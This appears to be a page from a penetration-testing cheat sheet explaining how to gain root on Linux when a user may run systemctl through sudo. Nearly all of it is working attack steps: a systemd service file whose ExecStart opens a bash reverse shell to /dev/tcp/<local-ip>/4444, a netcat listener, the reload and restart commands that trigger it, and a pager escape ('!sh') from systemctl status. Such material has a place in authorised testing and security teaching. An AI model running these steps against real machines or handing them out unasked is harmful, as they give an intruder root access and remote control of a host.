Sudo Systemctl Privilege Escalation

sudo systemctl is vulnerable to privilege escalation by modifying the configuration file.

Modify Configurations

sudo -l

(ALL) NOPASSWD: systemctl
Copied!

If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.

1. Update the Config File

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

[Unit]
This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
Copied!

Replace “<local-ip>” with your local ip address.

2. Start Listener in Local Machine

Then start listener for getting a root shell.

nc -lvnp 4444
Copied!

3. Restart the Service

Reload the daemon and restart.

sudo systemctl daemon-reload
sudo systemctl restart example.service
Copied!

Now we should get a shell in local machine.

sudo -l

# output
(ALL) NOPASSWD: systemctl status example.service
Copied!

If we can execute systemctl status as root, we can spawn another shell in the pager. Just run the command with sudo.

sudo systemctl status example.service
Copied!

Then enter the following command in the pager like less.

!sh
Copied!

Spawning the shell, then we can get another user shell.

References

https://gtfobins.github.io/gtfobins/systemctl/

PreviousSudo Shutdown, Poweroff Privilege Escalation NextSudo Tee Privilege Escalation

Last updated 2 years ago

hashtagModify Configurationsarrow-up-right

hashtag1. Update the Config Filearrow-up-right

hashtag2. Start Listener in Local Machinearrow-up-right

hashtag3. Restart the Servicearrow-up-right

hashtagSpawn Shell in the Pagerarrow-up-right

hashtagReferences

Modify Configurations

1. Update the Config File

2. Start Listener in Local Machine

3. Restart the Service

Spawn Shell in the Pager

References